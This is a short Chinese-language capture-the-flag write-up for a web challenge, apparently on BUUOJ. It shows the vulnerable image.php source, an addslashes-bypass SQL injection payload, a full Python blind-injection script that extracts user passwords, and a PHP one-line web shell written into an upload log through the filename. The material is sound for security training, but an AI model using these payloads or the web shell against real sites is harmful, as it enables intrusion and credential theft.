太久没打比赛,羊城杯被虐爆了,开始复健.
进入正题.
打开网页是登录框,随便输入账号密码,抓包,发现user.php.但是没有别的线索,扫下目录发现robots.txt.进入后发现可以下载备份文件,但是无法下载index.php,f12继续收集线索,图片那里有个image.php,尝试下载其备份,成功.
image.php:
<?php include "config.php"; $id=isset($_GET["id"])?$_GET["id"]:"1"; $path=isset($_GET["path"])?$_GET["path"]:""; $id=addslashes($id); $path=addslashes($path); $id=str_replace(array("\\0","%00","\\'","'"),"",$id); $path=str_replace(array("\\0","%00","\\'","'"),"",$path); $result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'"); $row=mysqli_fetch_array($result,MYSQLI_ASSOC); $path="./" . $row["path"]; header("Content-Type: image/jpeg"); readfile($path); ?>
看源码应该是sql注入.id和path处用addslashes函数做了处理.addslashes函数作用.之后又对id和path进行了过滤.结合前面的addslashes,绕过过滤:?id=\0'&path=or 1=1%23
.其中id经过addslashes处理之后变为\\0\'
,过滤之后剩下\
,所以查询语句变为select * from images where id='\' or path='or 1=1#'
,成功注入.接下来运行盲注脚本:
import requests url = 'http://e4bad4d9-a501-4046-9b3d-ea44d661d6d5.node3.buuoj.cn/image.php' flag = '' for i in range(1,300): print(i) low = 32 high =128 mid = (low+high)//2 while(low<high): payload = "?id=\\0'&path=or ascii(substr((select password from users),{},1))>{}%23".format(i,mid) r = requests.get(url=url+payload) if "JFIF" in r.text: low = mid+1 else: high = mid mid =(low+high)//2 if(mid ==32 or mid ==127): break flag +=chr(mid) print(flag)
(JFIF是抓image.php的包看到的.)
成功获取用户名和密码后,登录,一个文件上传界面.上传的东西会被放进日志里,将filename写为一句话木马,<?php不可用,使用短标签:<?=@eval($_POST['k']);?>
蚁剑连接,flag在根目录.
No responses yet